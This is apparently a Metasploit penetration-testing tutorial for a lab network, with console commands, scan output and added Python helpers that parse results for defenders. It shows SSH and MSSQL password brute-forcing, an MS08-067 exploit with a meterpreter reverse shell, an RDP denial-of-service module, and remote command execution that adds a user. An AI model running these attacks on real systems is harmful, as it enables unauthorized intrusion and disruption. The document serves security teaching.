Nmap
Using nmap inside msf is no different from using it standalone, so it is not repeated here.
msf5 > db_nmap -sV 192.168.172.130
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-07 16:20 CST
[*] Nmap: Nmap scan report for 192.168.172.130
[*] Nmap: Host is up (0.0011s latency).
[*] Nmap: Not shown: 997 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:02:A0:43 (VMware)
[*] Nmap: Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 10.00 seconds
auxiliary/scanner/
List all modules
msf5 > use auxiliary/scanner [press Tab twice]
Host discovery
Discovery methods
msf5 > use auxiliary/scanner/discovery/ [press Tab twice]
use auxiliary/scanner/discovery/arp_sweep use auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement
use auxiliary/scanner/discovery/empty_udp use auxiliary/scanner/discovery/udp_probe
use auxiliary/scanner/discovery/ipv6_multicast_ping use auxiliary/scanner/discovery/udp_sweep
ARP host discovery:
msf5 > use auxiliary/scanner/discovery/arp_sweep
# Set the target IP range (RHOSTS); accepted forms are 192.168.1.1-192.168.1.20, 192.168.1.1/24, or 192.168.1.1/24,192.168.2.1/24
msf5 auxiliary(scanner/discovery/arp_sweep) > options
# The source IP (SHOST) and source MAC (SMAC) can be spoofed
# Set the thread count to 20
msf5 auxiliary(scanner/discovery/arp_sweep) > set THREADS 20
msf5 auxiliary(scanner/discovery/arp_sweep) > run
[+] 192.168.172.1 appears to be up (VMware, Inc.).
[+] 192.168.172.2 appears to be up (VMware, Inc.).
[+] 192.168.172.130 appears to be up (VMware, Inc.).
[+] 192.168.172.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
Finding zombie hosts (sufficiently idle, with a sequentially increasing IPID)
msf5 > use auxiliary/scanner/ip/ipidseq
msf5 auxiliary(scanner/ip/ipidseq) > set rhosts 192.168.172.1/24
msf5 auxiliary(scanner/ip/ipidseq) > set ports 80
msf5 auxiliary(scanner/ip/ipidseq) > set threads 20
msf5 auxiliary(scanner/ip/ipidseq) > run
[*] 192.168.172.2's IPID sequence class: Incremental!
[*] Scanned 30 of 256 hosts (11% complete)
[*] Scanned 52 of 256 hosts (20% complete)
[*] Scanned 78 of 256 hosts (30% complete)
[*] Scanned 103 of 256 hosts (40% complete)
[*] 192.168.172.130's IPID sequence class: Incremental!
[*] Scanned 129 of 256 hosts (50% complete)
[*] Scanned 154 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
192.168.172.2 and 192.168.172.130 were found to have incremental IPIDs. If such a host is idle enough (not communicating with any other host), it can serve as a zombie and the scan is carried out through it instead.
Using nmap to run an idle (zombie) scan through the zombie host:
msf5 auxiliary(scanner/ip/ipidseq) > db_nmap -sV -PN -sI 192.168.172.130 192.168.172.133
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-08 15:12 CST
[*] Nmap: Idle scan using zombie 192.168.172.130 (192.168.172.130:80); Class: Incremental
[*] Nmap: Nmap scan report for 192.168.172.133
[*] Nmap: Host is up (0.051s latency).
[*] Nmap: Not shown: 986 closed|filtered ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 7/tcp open echo
[*] Nmap: 9/tcp open discard?
[*] Nmap: 13/tcp open daytime?
[*] Nmap: 17/tcp open qotd Windows qotd (English)
[*] Nmap: 19/tcp open chargen
[*] Nmap: 53/tcp open domain?
[*] Nmap: 80/tcp open http Microsoft IIS httpd 6.0
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
[*] Nmap: 1025/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 1028/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 1029/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 3389/tcp open ms-wbt-server Microsoft Terminal Service
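The ipidseq output above reports a sequence class per host, and that class is what decides whether a host could serve as a zombie. The following Python is an added example, not code from these notes or from Metasploit: it shows a simplified version of that classification over constructed IP ID samples, and parses the module's result lines into the list of hosts whose IP ID counter is predictable. From the defender's side those are the hosts whose network stack should be updated or configured to randomize the IP ID field, which is what keeps them out of the "Incremental" class. The thresholds SMALL_STEP and HALF_RANGE, the sample sequences, and the "Randomized" host in SAMPLE_OUTPUT are this example's own assumptions.

```python
import re
from typing import Dict, List

# Thresholds are this example's own simplification; they are not the exact
# rules Nmap or Metasploit's ipidseq module apply.
SMALL_STEP = 10        # consecutive IDs closer than this count as "incremental"
HALF_RANGE = 0x8000    # a 16-bit step this large or larger means the counter went backwards

# Shape of the module's per-host result line, e.g.
# "[*] 192.168.172.2's IPID sequence class: Incremental!"
RESULT_LINE = re.compile(
    r"^\[\*\] (?P<host>[^'\s]+)'s IPID sequence class: (?P<cls>[^!]+)!?\s*$")


def step16(prev: int, cur: int) -> int:
    """Forward distance from prev to cur on the 16-bit IP ID counter (wraps at 65535)."""
    return (cur - prev) % 0x10000


def swap16(value: int) -> int:
    """Swap the two bytes of a 16-bit value (host byte order vs. network order)."""
    return ((value & 0xFF) << 8) | ((value >> 8) & 0xFF)


def classify_ipid(samples: List[int]) -> str:
    """Classify the IP ID values one host returned to a series of probes, in probe order."""
    if len(samples) < 2:
        return "Unknown"
    if all(s == 0 for s in samples):
        return "All zeros"
    steps = [step16(a, b) for a, b in zip(samples, samples[1:])]
    if all(d == 0 for d in steps):
        return "Constant"
    if all(0 < d < SMALL_STEP for d in steps):
        return "Incremental"
    # Some stacks increment the field in host byte order and send it unswapped,
    # so the wire values look like 0x0100, 0x0200, ... until the bytes are swapped back.
    swapped = [swap16(s) for s in samples]
    swapped_steps = [step16(a, b) for a, b in zip(swapped, swapped[1:])]
    if all(0 < d < SMALL_STEP for d in swapped_steps):
        return "Broken little-endian incremental"
    if all(0 < d < HALF_RANGE for d in steps):
        return "Random positive increments"
    return "Randomized"


def predictable(cls: str) -> bool:
    """True for classes whose next IP ID can be foreseen, the property a zombie needs."""
    return cls in ("Incremental", "Broken little-endian incremental")


def parse_ipidseq_output(lines: List[str]) -> Dict[str, str]:
    """Map host -> reported class from the module's result lines; other lines are ignored."""
    found: Dict[str, str] = {}
    for line in lines:
        m = RESULT_LINE.match(line.strip())
        if m:
            found[m.group("host")] = m.group("cls").strip()
    return found


def hosts_to_fix(lines: List[str]) -> List[str]:
    """Hosts whose IP ID generation should be randomized, in IPv4 address order."""
    flagged = [h for h, c in parse_ipidseq_output(lines).items() if predictable(c)]
    return sorted(flagged, key=lambda h: tuple(int(x) for x in h.split(".")))


# Constructed module output modelled on the lines shown above (the "Randomized"
# host is invented for contrast).
SAMPLE_OUTPUT = [
    "[*] 192.168.172.2's IPID sequence class: Incremental!",
    "[*] Scanned 30 of 256 hosts (11% complete)",
    "[*] 192.168.172.130's IPID sequence class: Incremental!",
    "[*] 192.168.172.140's IPID sequence class: Randomized",
    "[*] Auxiliary module execution completed",
]

if __name__ == "__main__":
    for label, seq in {
        "incremental": [1000, 1001, 1002, 1003],
        "wrapping": [65534, 65535, 0, 1],
        "byte-swapped": [0x0100, 0x0200, 0x0300],
        "random": [40000, 3000, 60000, 100],
    }.items():
        print(f"{label:13s} -> {classify_ipid(seq)}")
    print("randomize IP IDs on:", hosts_to_fix(SAMPLE_OUTPUT))
```

The wrap-around and byte-swapped cases are the two that a naive "is each value one more than the last" check gets wrong, which is why the distance is taken modulo 2^16 and why the sequence is re-tested after swapping bytes.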
Port scanning (nmap is recommended, as it is more efficient)
Scan methods
msf5 > use auxiliary/scanner/portscan/ [press Tab twice]
use auxiliary/scanner/portscan/ack use auxiliary/scanner/portscan/syn use auxiliary/scanner/portscan/xmas
use auxiliary/scanner/portscan/ftpbounce use auxiliary/scanner/portscan/tcp
SYN scan
msf5 > use auxiliary/scanner/portscan/syn
msf5 auxiliary(scanner/portscan/syn) > set rhosts 192.168.172.130
msf5 auxiliary(scanner/portscan/syn) > set ports 80
msf5 auxiliary(scanner/portscan/syn) > set threads 50
msf5 auxiliary(scanner/portscan/syn) > run
SNMP scanning
Cracking community strings
msf5 > use auxiliary/scanner/snmp/snmp_login
msf5 auxiliary(scanner/snmp/snmp_login) > set rhosts 192.168.172.135
msf5 auxiliary(scanner/snmp/snmp_login) > set threads 10
msf5 auxiliary(scanner/snmp/snmp_login) > run
A community string with read-only access was cracked:
[+] 192.168.172.135:161 - Login Successful: public (Access level: read-only); Proof (sysDescr.0): Linux bingyi-virtual-machine 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64
Reading information
msf5 auxiliary(scanner/snmp/snmp_login) > use auxiliary/scanner/snmp/snmp_enum
msf5 auxiliary(scanner/snmp/snmp_enum) > set rhosts 192.168.172.135
msf5 auxiliary(scanner/snmp/snmp_enum) > run
[*] System information:
Host IP : 192.168.172.135
Hostname : bingyi-virtual-machine
Description : Linux bingyi-virtual-machine 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64
Contact : Me <me@example.org>
Location : Sitting on the Dock of the Bay
Uptime snmp : 11:18:08.39
Uptime system : 00:06:23.04
System date : 2020-11-9 10:51:42.0
Windows:
# Enumerate user information
use auxiliary/scanner/snmp/snmp_enumusers
# Enumerate file share information
use auxiliary/scanner/snmp/snmp_enumshares
SMB scanning
Discovery
msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.172.131
msf5 auxiliary(scanner/smb/smb_version) > run
[*] 192.168.172.131:445 - Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] 192.168.172.131:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Scanning named pipes
msf5 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/pipe_auditor
msf5 auxiliary(scanner/smb/pipe_auditor) > set rhosts 192.168.172.131
msf5 auxiliary(scanner/smb/pipe_auditor) > run
Enumerating shares
msf5 auxiliary(scanner/smb/pipe_auditor) > use auxiliary/scanner/smb/smb_enumshares
msf5 auxiliary(scanner/smb/smb_enumshares) > set rhosts 192.168.172.131
msf5 auxiliary(scanner/smb/smb_enumshares) > set smbuser msfadmin
msf5 auxiliary(scanner/smb/smb_enumshares) > set smbpass msfadmin
msf5 auxiliary(scanner/smb/smb_enumshares) > run
SSH scanning
Discovery
Version scan; an old version may have exploitable vulnerabilities.
msf5 > use auxiliary/scanner/ssh/ssh_version
msf5 auxiliary(scanner/ssh/ssh_version) > set rhosts 192.168.172.135
msf5 auxiliary(scanner/ssh/ssh_version) > run
[+] 192.168.172.135:22 - SSH server version: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8 ( service.version=7.2p2 openssh.comment=Ubuntu-4ubuntu2.8 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:7.2p2 os.vendor=Ubuntu os.family=Linux os.product=Linux os.version=16.04 os.cpe23=cpe:/o:canonical:ubuntu_linux:16.04 service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.172.135:22 - Scanned 1 of 1 hosts (100% complete)
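The ssh_version result above carries a key=value fingerprint after the raw banner, and that is the useful part when tracking SSH versions across a fleet. This Python is an added example, not code from these notes or from Metasploit: it splits a result line into host, port, banner and a dict of the fingerprint fields, turns an OpenSSH version such as 7.2p2 into a comparable tuple, and flags servers older than a baseline. MIN_OPENSSH is an arbitrary value chosen for the example; SAMPLE_LINE is the result line copied from the output above.

```python
import re
from typing import Dict, Optional, Tuple

# Shape of the ssh_version result line shown above: host:port, the raw banner,
# then a parenthesised list of key=value fingerprint fields.
SSH_VERSION_LINE = re.compile(
    r"^\[\+\] (?P<host>[^\s:]+):(?P<port>\d+) - SSH server version: "
    r"(?P<banner>.*?) \( (?P<fields>.*) \)\s*$")

# Baseline chosen for this example only; use whatever version your policy requires.
MIN_OPENSSH = (8, 0, 0)

# The result line from the output above, copied verbatim as test input.
SAMPLE_LINE = (
    "[+] 192.168.172.135:22 - SSH server version: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8 "
    "( service.version=7.2p2 openssh.comment=Ubuntu-4ubuntu2.8 service.vendor=OpenBSD "
    "service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:7.2p2 "
    "os.vendor=Ubuntu os.family=Linux os.product=Linux os.version=16.04 "
    "os.cpe23=cpe:/o:canonical:ubuntu_linux:16.04 service.protocol=ssh fingerprint_db=ssh.banner )")


def parse_ssh_version_line(line: str) -> Optional[Dict[str, object]]:
    """Split one result line into host, port, banner and a dict of fingerprint fields."""
    m = SSH_VERSION_LINE.match(line.strip())
    if not m:
        return None
    fields: Dict[str, str] = {}
    for token in m.group("fields").split():
        key, sep, value = token.partition("=")
        if sep:                      # ignore stray tokens without '='
            fields[key] = value
    return {"host": m.group("host"), "port": int(m.group("port")),
            "banner": m.group("banner"), "fields": fields}


def openssh_version(text: str) -> Tuple[int, int, int]:
    """'7.2p2' -> (7, 2, 2); '8.9' -> (8, 9, 0). Raises ValueError for anything else."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:p(\d+))?", text.strip())
    if not m:
        raise ValueError(f"not an OpenSSH version string: {text!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def below_baseline(record: Dict[str, object],
                   minimum: Tuple[int, int, int] = MIN_OPENSSH) -> Optional[bool]:
    """True if an OpenSSH server is older than the baseline; None when the family is not OpenSSH."""
    fields = record["fields"]
    if fields.get("service.family") != "OpenSSH" or "service.version" not in fields:
        return None
    return openssh_version(fields["service.version"]) < minimum


if __name__ == "__main__":
    rec = parse_ssh_version_line(SAMPLE_LINE)
    print(rec["host"], rec["fields"]["service.version"], rec["fields"].get("os.cpe23"))
    print("below baseline:", below_baseline(rec))
```

Comparing version tuples rather than strings matters here: as strings, "7.2p2" and "7.10" would sort the wrong way round.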
Password brute-forcing
msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.172.135
msf5 auxiliary(scanner/ssh/ssh_login) > set username bingyi
msf5 auxiliary(scanner/ssh/ssh_login) > set pass_file ~/Desktop/dic/shhpass.txt
msf5 auxiliary(scanner/ssh/ssh_login) > set threads 10
msf5 auxiliary(scanner/ssh/ssh_login) > run
[+] 192.168.172.135:22 - Success: 'bingyi:123' 'uid=1000(bingyi) gid=1000(bingyi) groups=1000(bingyi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) Linux bingyi-virtual-machine 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (192.168.172.129:35897 -> 192.168.172.135:22) at 2020-11-11 13:00:13 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Key-based login brute-forcing
msf5 auxiliary(scanner/ssh/ssh_login) > use auxiliary/scanner/ssh/ssh_login_pubkey
msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > set rhosts 192.168.172.135
msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > show options
msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > set key_path key.txt
msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > run
FTP
Version scan
msf5 > use auxiliary/scanner/ftp/ftp_version
msf5 auxiliary(scanner/ftp/ftp_version) > set rhosts 192.168.172.131
msf5 auxiliary(scanner/ftp/ftp_version) > run
[+] 192.168.172.131:21 - FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] 192.168.172.131:21 - Scanned 1 of 1 hosts (100% complete)
Trying anonymous login
msf5 auxiliary(scanner/ftp/ftp_version) > use auxiliary/scanner/ftp/anonymous
msf5 auxiliary(scanner/ftp/anonymous) > set rhosts 192.168.172.131
msf5 auxiliary(scanner/ftp/anonymous) > run
[+] 192.168.172.131:21 - 192.168.172.131:21 - Anonymous READ (220 (vsFTPd 2.3.4))
[*] 192.168.172.131:21 - Scanned 1 of 1 hosts (100% complete)
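The snmp_login, ssh_login and ftp/anonymous sections above each end in a "[+]" success line, and those lines are the ones a report needs. The Python below is an added example, not code from these notes or from Metasploit: it parses the three line shapes into findings with a type and severity, and deliberately leaves the recovered SSH password out of the finding so the report does not become a second copy of the credential. The severity mapping and the READ/WRITE form of the FTP line are this example's assumptions; the success lines in SAMPLE_LINES are copied from the output above.

```python
import re
from typing import Dict, List, Optional

# Community strings that ship as defaults and deserve a higher severity on their own.
DEFAULT_COMMUNITIES = {"public", "private"}

# One pattern per result line shape shown in the SNMP, SSH and FTP sections above.
SNMP_OK = re.compile(
    r"^\[\+\] (?P<host>[^\s:]+):(?P<port>\d+) - Login Successful: (?P<community>\S+) "
    r"\(Access level: (?P<access>[^)]+)\)")
SSH_OK = re.compile(
    r"^\[\+\] (?P<host>[^\s:]+):(?P<port>\d+) - Success: '(?P<user>[^:']+):(?P<password>[^']*)'")
# The notes only show "Anonymous READ"; READ/WRITE is assumed to be the write-access form.
FTP_ANON = re.compile(
    r"^\[\+\] (?P<host>[^\s:]+):(?P<port>\d+) - (?:\S+ - )?Anonymous (?P<perm>READ(?:/WRITE)?) "
    r"\((?P<banner>.*)\)\s*$")


def parse_finding(line: str) -> Optional[Dict[str, str]]:
    """Turn one successful-login line into a finding, or None for any other line."""
    line = line.strip()
    m = SNMP_OK.match(line)
    if m:
        community, access = m.group("community"), m.group("access")
        severe = community in DEFAULT_COMMUNITIES or "write" in access
        return {"host": m.group("host"), "port": m.group("port"), "type": "snmp-community",
                "severity": "high" if severe else "medium",
                "detail": f"community '{community}' grants {access} access"}
    m = SSH_OK.match(line)
    if m:
        # The password itself is deliberately not copied into the finding.
        return {"host": m.group("host"), "port": m.group("port"), "type": "ssh-password",
                "severity": "critical",
                "detail": f"user '{m.group('user')}' accepted a wordlist password (not recorded)"}
    m = FTP_ANON.match(line)
    if m:
        perm = m.group("perm")
        return {"host": m.group("host"), "port": m.group("port"), "type": "ftp-anonymous",
                "severity": "high" if "WRITE" in perm else "medium",
                "detail": f"anonymous {perm} access, banner {m.group('banner')!r}"}
    return None


def collect_findings(lines: List[str]) -> List[Dict[str, str]]:
    """Findings for every matching line, in input order."""
    return [f for f in (parse_finding(l) for l in lines) if f is not None]


# The three success lines from the output above, copied verbatim, plus one status
# line that must be ignored.
SAMPLE_LINES = [
    "[+] 192.168.172.135:161 - Login Successful: public (Access level: read-only); "
    "Proof (sysDescr.0): Linux bingyi-virtual-machine 4.4.0-21-generic #37-Ubuntu SMP "
    "Mon Apr 18 18:33:37 UTC 2016 x86_64",
    "[*] 192.168.172.135:22 - Scanned 1 of 1 hosts (100% complete)",
    "[+] 192.168.172.135:22 - Success: 'bingyi:123' 'uid=1000(bingyi) gid=1000(bingyi) "
    "groups=1000(bingyi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),"
    "128(sambashare) Linux bingyi-virtual-machine 4.4.0-21-generic #37-Ubuntu SMP "
    "Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '",
    "[+] 192.168.172.131:21 - 192.168.172.131:21 - Anonymous READ (220 (vsFTPd 2.3.4))",
]

if __name__ == "__main__":
    for finding in collect_findings(SAMPLE_LINES):
        print(f"{finding['severity']:8s} {finding['host']}:{finding['port']} "
              f"{finding['type']}: {finding['detail']}")
```

The FTP pattern tolerates the duplicated "host:port - " prefix visible in the output above, and the SNMP pattern stops at the access level so the sysDescr proof does not have to be parsed.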
Password cracking
Omitted.
Windows: using an existing shell to collect the target's missing patches
Get a shell and migrate it into another process
msf5 > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.172.130
msf5 exploit(windows/smb/ms08_067_netapi) > set target 34
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > run -j
# Enter the session
msf5 exploit(windows/smb/ms08_067_netapi) > sessions -i 2
# Show the process the shell is currently running in
meterpreter > getpid
# List all processes on the target host
meterpreter > ps
# Migrate the shell into another process
meterpreter > migrate 880
# If the error "[-] Known bug in WMI query, try migrating to another process" appears later, migrate to yet another process
Get the list of missing patches
msf5 exploit(windows/smb/ms08_067_netapi) > use post/windows/gather/enum_patches
msf5 post(windows/gather/enum_patches) > set session 2
msf5 post(windows/gather/enum_patches) > run
VNC
Password cracking
msf5 > use auxiliary/scanner/vnc/vnc_login
msf5 auxiliary(scanner/vnc/vnc_login) > show options
Checking for login without a password (no authentication)
msf5 > use auxiliary/scanner/vnc/vnc_none_auth
RDP (Remote Desktop) vulnerabilities
Check whether a specific vulnerability is present
msf5 > use auxiliary/scanner/rdp/ms12_020_check
msf5 auxiliary(scanner/rdp/ms12_020_check) > show options
...
Exploitation
msf5 auxiliary(scanner/rdp/ms12_020_check) > search ms12-020
msf5 auxiliary(scanner/rdp/ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf5 auxiliary(scanner/rdp/ms12_020_check) > show options
...
MSSQL
Port lookup
Default port: TCP 1433 (or a dynamic port)
How to look up the dynamic port:
msf5 > use auxiliary/scanner/mssql/mssql_ping
msf5 auxiliary(scanner/mssql/mssql_ping) > set rhosts 192.168.172.135
msf5 auxiliary(scanner/mssql/mssql_ping) > run
Password brute-forcing
msf5 > use auxiliary/scanner/mssql/mssql_login
msf5 auxiliary(scanner/mssql/mssql_login) > set rhosts 192.168.172.135
# If a dynamic port is in use, it must be set manually
msf5 auxiliary(scanner/mssql/mssql_login) > set rport 49165
msf5 auxiliary(scanner/mssql/mssql_login) > set threads 10
msf5 auxiliary(scanner/mssql/mssql_login) > set pass_file pass.txt
msf5 auxiliary(scanner/mssql/mssql_login) > run
Remote code execution
Once the port, account and password are known, remote commands can be executed.
msf5 > use auxiliary/admin/mssql/mssql_exec
msf5 auxiliary(admin/mssql/mssql_exec) > set rhosts 192.168.172.135
msf5 auxiliary(admin/mssql/mssql_exec) > set password 123
# For a dynamic port
msf5 auxiliary(admin/mssql/mssql_exec) > set rport 49165
# The command to execute adds a user
msf5 auxiliary(admin/mssql/mssql_exec) > set CMD net user user pass /ADD
Searching for exploits after obtaining the application version
msf5 > use auxiliary/scanner/ftp/ftp_version
msf5 auxiliary(scanner/ftp/ftp_version) > set rhosts 192.168.172.131
msf5 auxiliary(scanner/ftp/ftp_version) > run
[+] 192.168.172.131:21 - FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] 192.168.172.131:21 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
For example, once the FTP version is known to be 2.3.4, search by the version string:
msf5 auxiliary(scanner/ftp/ftp_login) > search 2.3.4
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/gather/teamtalk_creds normal No TeamTalk Gather Credentials
1 exploit/multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution
2 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection
3 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
4 exploit/unix/http/zivif_ipcheck_exec 2017-09-01 excellent Yes Zivif Camera iptest.cgi Blind Remote Command Execution
Interact with a module by name or index, for example use 4 or use exploit/unix/http/zivif_ipcheck_exec
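Searching for the bare string 2.3.4, as above, also returns modules that have nothing to do with vsFTPd, so the results need triage before anything is concluded about the service. The Python below is an added example, not code from these notes or from Metasploit: it parses the "Matching Modules" table (index, name, optional disclosure date, rank, Check column, description) and keeps only the rows that mention the product name and, if given, the version. SAMPLE_TABLE reproduces the rows shown above; the rank vocabulary in ROW is Metasploit's standard set of module ranks.

```python
import re
from typing import Dict, List

# One data row of the "Matching Modules" table as the console prints it, after the
# column padding has collapsed to single spaces: index, module name, optional
# disclosure date, rank, Check column, description.
ROW = re.compile(
    r"^(?P<index>\d+)\s+(?P<name>\S+)\s+"
    r"(?:(?P<date>\d{4}-\d{2}-\d{2})\s+)?"
    r"(?P<rank>manual|low|average|normal|good|great|excellent)\s+"
    r"(?P<check>Yes|No)\s+(?P<description>.+?)\s*$")


def parse_search_table(text: str) -> List[Dict[str, str]]:
    """Parse the data rows of a 'search' result table; headers and footers are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            rows.append({k: (v or "") for k, v in m.groupdict().items()})
    return rows


def relevant_rows(rows: List[Dict[str, str]], product: str, version: str = "") -> List[Dict[str, str]]:
    """Rows that mention the product; if a version is given it must also appear in the
    description (e.g. 'v2.3.4') or, with the dots removed, in the module name (e.g. '_234_')."""
    needle = product.lower()
    compact = version.replace(".", "")
    hits = []
    for row in rows:
        text = f"{row['name']} {row['description']}".lower()
        if needle not in text:
            continue
        if version and version not in row["description"] and compact not in row["name"]:
            continue
        hits.append(row)
    return hits


# The table from the search output above, reproduced as constructed test input.
SAMPLE_TABLE = """\
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/gather/teamtalk_creds normal No TeamTalk Gather Credentials
1 exploit/multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution
2 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection
3 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
4 exploit/unix/http/zivif_ipcheck_exec 2017-09-01 excellent Yes Zivif Camera iptest.cgi Blind Remote Command Execution
Interact with a module by name or index, for example use 4 or use exploit/unix/http/zivif_ipcheck_exec
"""

if __name__ == "__main__":
    rows = parse_search_table(SAMPLE_TABLE)
    print(f"{len(rows)} rows parsed")
    for row in relevant_rows(rows, "vsftpd", "2.3.4"):
        print(row["name"], "| rank:", row["rank"], "| check:", row["check"], "|", row["description"])
```

The Check column is worth reading once the list is narrowed: a "No" there (as for the vsftpd row) means the module offers no safe check mode, so confirming the finding on a production host needs another method.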